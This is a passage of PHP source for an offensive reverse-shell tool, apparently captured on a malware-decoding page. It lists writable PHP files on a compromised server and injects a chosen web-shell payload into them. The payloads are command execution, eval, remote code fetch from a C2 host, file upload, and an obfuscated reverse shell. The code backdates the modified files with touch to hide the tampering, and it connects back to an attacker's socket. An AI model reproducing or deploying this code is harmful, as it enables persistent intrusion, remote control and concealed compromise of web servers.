if(count($webfiles_arr) > 0) fwrite($s, cyan("[*] ").white("Found ".count($webfiles_arr)." writable PHP files:\n"));
for($i=0;$i<count($webfiles_arr);$i++)
fwrite($s, red("[$i] ").$webfiles_arr[$i].PHP_EOL);
fwrite($s,cyan("\n[*] ").white("Choose the files you want to infect.\n Separate by comma (e.g:1,5,7,8) and/or by range (e.g:10-16).\n Files: "));
while($data2 = fread($s, 1024)){ //receive numbers and parse
$files = str_replace(" ", "", substr($data2, 0, -1)); //remove whitespaces and newline at end
$files = explode(",",$files); //split
if(count($files) == 1 && $files[0] == "") return; //no file selected
$toInfect = array();
foreach($files as $file){
if(preg_match("/^[0-9]+$/",$file)) // filter numbers
array_push($toInfect, $file);
if(preg_match("/^[0-9]+\-[0-9]+$/",$file)){ // filter ranges
$range = explode("-",$file); // ex:4-6 -> $range[0]=4, $range[1]=6
if((int)$range[0] < (int)$range[1]) // 4 must be < than 6
for($i=(int)$range[0];(int)$i<=$range[1];$i++) // from i=4 to i=6
array_push($toInfect, $i);
}
}
sort($toInfect,SORT_NUMERIC);
choose_payload($webfiles_arr,array_unique($toInfect)); //remove duplicates
return;
}
}
function choose_payload($allFiles,$toInfect){
global $s;
$payloads = array(
//curl -d "0=whoami" website.com/infected_file.php
//curl website.com/infected_file.php?0=whoami
"0. TinyRCE " => '<?=`$_REQUEST[0]`;?>',
//same
"1. ClassicRCE " => '<?=@system($_REQUEST[0]);?>',
//curl -d "0=phpinfo();" website.com/infected_file.php
"2. Eval " => '<?=@eval($_REQUEST[0]);?>',
//curl -d "0=cGhwaW5mbygpOw==" website.com/infected_file.php (encoded phpinfo())
"3. BasedEval " => '<?=@eval(base64_decode($_REQUEST[0]));?>',
//curl -d "0=c2.com/file_to_be_executed.txt" website.com/infected_file.php
"4. RemotePHP " => '<?=@eval(file_get_contents($_REQUEST[0]));?>',
//curl -d "0=c2.com/file_to_upload&1=extension" website.com/infected_file.php
"5. RemoteUpload " => '<?=$hzjt0=rand(100,999);@file_put_contents(base64_decode('Li8=').$hzjt0.base64_decode('Lg==').$_REQUEST[1],@file_get_contents($_REQUEST[0]));echo $hzjt0.$_REQUEST[1];?>',
//curl -F "0=@file_to_upload.php" website.com/infected_file.php
"6. LocalUpload " => '<?php if(isset($_FILES[base64_decode('MA==')]))if(move_uploaded_file($_FILES[base64_decode('MA==')][base64_decode('dG1wX25hbWU=')],base64_decode('Xw==').$_FILES[base64_decode('MA==')][base64_decode('bmFtZQ==')]))echobase64_decode('VXBsb2FkZWQ6IF8=').$_FILES[base64_decode('MA==')][base64_decode('bmFtZQ==')];?>',
//curl "0=your_ip&1=port" website.com/infected_file.php
"7. StableShell " => '<?php $pqnu1=base64_decode('c2NyaXB0IC1xYyAvYmluL2Jhc2ggL2Rldi9udWxs');umask(0);$spaj2=fsockopen($_REQUEST[0],$_REQUEST[1],$fpae3,$lplh4,30);$iqrs5=array(0=>array(base64_decode('cGlwZQ=='),base64_decode('cg==')),1=>array(base64_decode('cGlwZQ=='),base64_decode('dw==')),2=>array(base64_decode('cGlwZQ=='),base64_decode('dw==')));$suoi6=proc_open($pqnu1,$iqrs5,$suuc7);foreach($suuc7 as $tokm8)stream_set_blocking($tokm8,0);stream_set_blocking($spaj2,0);while(!feof($spaj2)){$cqgs9=array($spaj2,$suuc7[1],$suuc7[2]);if(in_array($spaj2,$cqgs9))fwrite($suuc7[0],fread($spaj2,2048));if(in_array($suuc7[1],$cqgs9))fwrite($spaj2,fread($suuc7[1],2048));if(in_array($suuc7[2],$cqgs9))fwrite($spaj2,fread($suuc7[2],2048));}fclose($spaj2);foreach($suuc7 as $tokm8)fclose($tokm8);proc_close($suoi6);?>'
);
fwrite($s, cyan("\n[i] ").white("List of payloads available:\n"));
$i=true;
foreach($payloads as $name => $code){
$desc = $i ? cyan($name).$code : cyan($name).white($code);
fwrite($s, $desc."\n");
$i = !$i; //toggle payload color
}
fwrite($s, cyan("\n[?] ").white("Choose a payload to infect the selected files (default:0): "));
while($choosed_payload = fread($s, 128)){
$user_payload = 0;
if((int)$choosed_payload <= count($payloads)+1)
$user_payload = $choosed_payload;
break;
}
fwrite($s, cyan("[?] ").white("Do you want do insert the payload at the beginning [0] or end [1] of the file (default: 1)? "));
while($position = fread($s, 128)){
$position = 1;
if((int)$position === 0) $position = 0;
break;
}
infect($allFiles,$toInfect,(int)$user_payload,$payloads,(int)$position);
return;
}
//list of all writable php files, files to be infected, index of choosen payload, list of payload, position (beginning or end of file)
function infect($allFiles,$fileArr,$payload_index,$payload_list,$position=1){
// 1 = end; 0 = beginning
global $s;
$payload = $payload_list[array_keys($payload_list)[$payload_index]]; //the payload itself
fwrite($s, yellow("\n[!] ").white("Files to infect:\n"));
foreach($fileArr as $fileToInfect)
fwrite($s,$allFiles[$fileToInfect]."\n");
fwrite($s, yellow("[!] ").white("Payload: ").$payload_list[array_keys($payload_list)[$payload_index]]."\n");
$position_str = $position ? "End of file" : "Beginnig of file";
fwrite($s, yellow("[!] ").white("Position: ").$position_str."\n");
fwrite($s, cyan("[?] ").white("Are you sure you want to infect those files? [Y/n]"));
while($sure = fread($s, 128)){
if(strtolower(substr($sure,0,1)) == "n") return; //not sure, return
break;
}
foreach($fileArr as $fileToInfect){
$filePath = $allFiles[$fileToInfect]; //fileToInfect is an integer that is the index of the array $allFiles
if(isAvailable("file_get_contents") && isAvailable("file_put_contents")){
$old = file_get_contents($filePath);
$originalDate = str_replace("\n","",run_cmd("stat ".$filePath.' | grep Modify | sed "s/Modify: //"')); //modify date
if($position) //end of file
$written = file_put_contents($filePath, "\n".$payload, FILE_APPEND) ? 1 : 0;
else //beginning of file
$written = file_put_contents($filePath, $payload."\n".$old) ? 1 : 0;
$result = $written ? green("[+] ").white($filePath." was infected with payload !") : red("[-] ").white($filePath." Error!");
fwrite($s,$result."\n");
if(run_cmd("touch -d ".'"'.$originalDate.'" '.$filePath))
fwrite($s,green("[+] ").white("Mantained original 'modified date' (".$originalDate.").\n"));
}
}
return;
}
function parse_stdin($input){
global $s, $color;
switch(substr($input,0,-1)){ // remove newline at end
case "!all-colors":
$color = !$color;
break;
case "!info":
return sysinfo();
break;
case "!enum":
return enum();
break;
case "!suggester":
return suggester();
break;
case "!color":
refresh_ps1(true);
break;
case "!help":
return help();
break;
case "!php":
$phpCode = getPHP();
if($phpCode !== 0){
$result = runPHP($phpCode);
fwrite($s, $result);
}else{
fwrite($s, yellow("[i] Code canceled.").PHP_EOL);
}
break;
case "!stabilize":
stabilize();
break;
case "!backdoor":
backdoor();
break;
case "!passwd":
passwd();
break;
case "!duplicate":
duplicate();
break;
case "!infect":
select_files();
break;
}
}
function cmd_not_found($cmd){
global $s, $commands;
foreach($commands as $valid_cmd){
similar_text($cmd, $valid_cmd, $percentage);
if($percentage > 70){ // if they're similar, suggest correction
fwrite($s, yellow("[!] ")."Command '!$cmd' not found. Did you mean '!".$valid_cmd."'?.\n");
return;
}
}
fwrite($s, yellow("[!] ")."Command '!".substr($c,1,-1)."' not found. Use !help.\n");
return;
}
function connect(){
global $use_password,$commands,$ps1,$s,$silent;
refresh_ps1(1);
if(!isAvailable('fsockopen')) die(red("[-]")." Function 'fsockopen' isn't available.");
if($use_password)
if(!check_password()) die(fwrite($s,red("[-]")." Wrong password.\n")); // guess what
if(!isset($_REQUEST['silent']) && !isset($_REQUEST["s"]) && !$silent) //if not in silent mode
fwrite($s, banner()."\n"); //send banner through socket
refresh_ps1();
fwrite($s, "\n".$ps1);
while($c = fread($s, 2048)){
$out = '';
if(substr($c,0,1) == "!"){//if starts with "!"
if(in_array(strtolower(substr($c,1,-1)), $commands)) // if the command is valid
$out = parse_stdin($c);
else
cmd_not_found(substr($c,1,-1)); // try to suggest correction
}elseif(substr($c, 0, 3) == 'cd '){
chdir(substr($c, 3, -1)); // since this isn't interactive, use chdir
}elseif(substr($c,0,-1) == "exit"){
fwrite($s, yellow("[i] ")."Closing connection.\n");
fclose($s);
die();
}else{
$out = run_cmd(substr($c, 0, -1));
}
if($out === false){
fwrite($s, red('[-] There are no exec functions'));
break;
}
refresh_ps1();
fwrite($s, $out.$ps1);
}
fclose($s);
}
########################## END FUNCTIONS ##########################
if($auto_verify_update) verify_update();
if(isset($_REQUEST['stabilize']) && $_REQUEST['stabilize']){ //stabilized shell was requested
$x = $_POST['x'];
stabilize($x);
}else{ // use normal (not interactive) connection
$s = @fsockopen("tcp://$ip", $port);
if(!$s) die(red("[-] ")."Couldn't connect to socket $ip:$port.");
connect();
}Function Calls
| None |
Stats
| MD5 | a7d8bec80e82581dabb2bf54f84644a6 |
| Eval Count | 0 |
| Decode Time | 119 ms |